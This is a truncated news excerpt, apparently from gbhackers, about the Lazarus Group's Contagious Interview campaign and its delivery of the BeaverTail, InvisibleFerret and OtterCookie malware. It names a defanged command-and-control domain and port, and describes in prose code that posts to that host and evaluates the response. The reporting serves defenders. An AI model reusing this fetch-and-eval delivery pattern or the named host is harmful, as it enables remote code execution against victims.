Lazarus Group Enhances Malware with New OtterCookie Payload Delivery Technique
gbhackersThe Contagious Interview campaign conducted by the Lazarus Group continues to expand its capabilities. We have observed an exponential evolution in the delivery mechanisms for the campaign’s main payloads: BeaverTail, InvisibleFerret, and OtterCookie.
In this article, we will discuss the innovations related to the delivery techniques used by the group and demonstrate the preservation of the group’s modus operandi throughout their code’s evolution. To this end, we analyzed 3 distinct malicious projects that were highly active in campaigns.
Delivery Mechanism 1: Eval Function
In one of the projects, the group’s developers created and implemented a code snippet that performs a POST request to an external address named fashdefi[.]store using port 6168.
After the request, the flow code captures the request’s response, stores it in the token object, and executes the content using ...
Copyright of this story solely belongs to gbhackers . To see the full text click HERE